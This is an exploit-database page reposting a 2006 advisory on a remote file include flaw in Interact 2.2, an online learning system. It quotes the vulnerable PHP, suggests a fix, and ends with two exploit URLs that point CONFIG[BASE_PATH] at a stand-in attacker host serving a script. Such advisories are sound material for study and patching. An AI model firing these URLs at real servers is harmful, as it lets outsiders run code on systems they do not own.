Exploitalert - Database of Exploits

interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability

CVE	Category	Price	Severity
CVE-2007-2951	CWE-98	Not specified	High

Author	Risk	Exploitation Type	Date
Ibid	High	Remote	2006-09-04

CPE	PURL
cpe:cpe:/a:interact:interact:2.2	pkg:pkg:exploit/interact-2-2-config-base-path-remote-file-include-vulnerability

CVSS	EPSS	EPSSP
Not available	0.02192	0.50148

CVSS vector description

http://cxsecurity.com/ascii/WLB-2006080178

/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: Interact - Online Learning and Collaboration System v. 2.2.0 - [Script site: https://sourceforge.net/projects/cce-interact/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: CarcaBot + - Contact: CarcaBotx (at) yahoo (dot) com [email concealed] - or - http://Hacking.CarcaBot.ro + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: CarcaBot - http://Hacking.CarcaBot.ro - + */ /* vulnerable code => admin/autoprompter.php line 33-38: .... require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc. php'); require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php'); $rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey, {$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt, {$CONFIG['DB_PREFIX']}posts.subject, {$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key, {$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name, {$CONFIG['DB_PREFIX']}posts.added_by_key FROM {$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON {$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX' ]}postsAutoPrompts.post_key WHERE {$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX' ]}posts.post_key AND {$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace Links.ModuleKey AND {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp aces.SpaceKey AND {$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL {$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND {$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY {$CONFIG['DB_PREFIX']}posts.post_key"); .... Fix Exploit: admin/autoprompter.php line 33-38: .... require_once('../local/config.inc.php'); require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc. php'); require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php'); $rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey, {$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt, {$CONFIG['DB_PREFIX']}posts.subject, {$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key, {$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name, {$CONFIG['DB_PREFIX']}posts.added_by_key FROM {$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON {$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX' ]}postsAutoPrompts.post_key WHERE {$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX' ]}posts.post_key AND {$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace Links.ModuleKey AND {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp aces.SpaceKey AND {$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL {$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND {$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY {$CONFIG['DB_PREFIX']}posts.post_key"); .... vulnerable code => includes/common.inc.php line 35-40: .... $CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb'; //Include database abstraction classes require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php'); require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php'); .... Exploit Fix: includes/common.inc.php line 35-40: .... require_once('../local/config.inc.php'); $CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb'; //Include database abstraction classes require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php'); require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php'); */ #Exploit: http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BA SE_PATH]=[http://www.myevilsite.com/evil_scripts.txt] http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[B ASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt] ### End of File ### ### http://Hacking.CarcaBot.ro ###

Impressum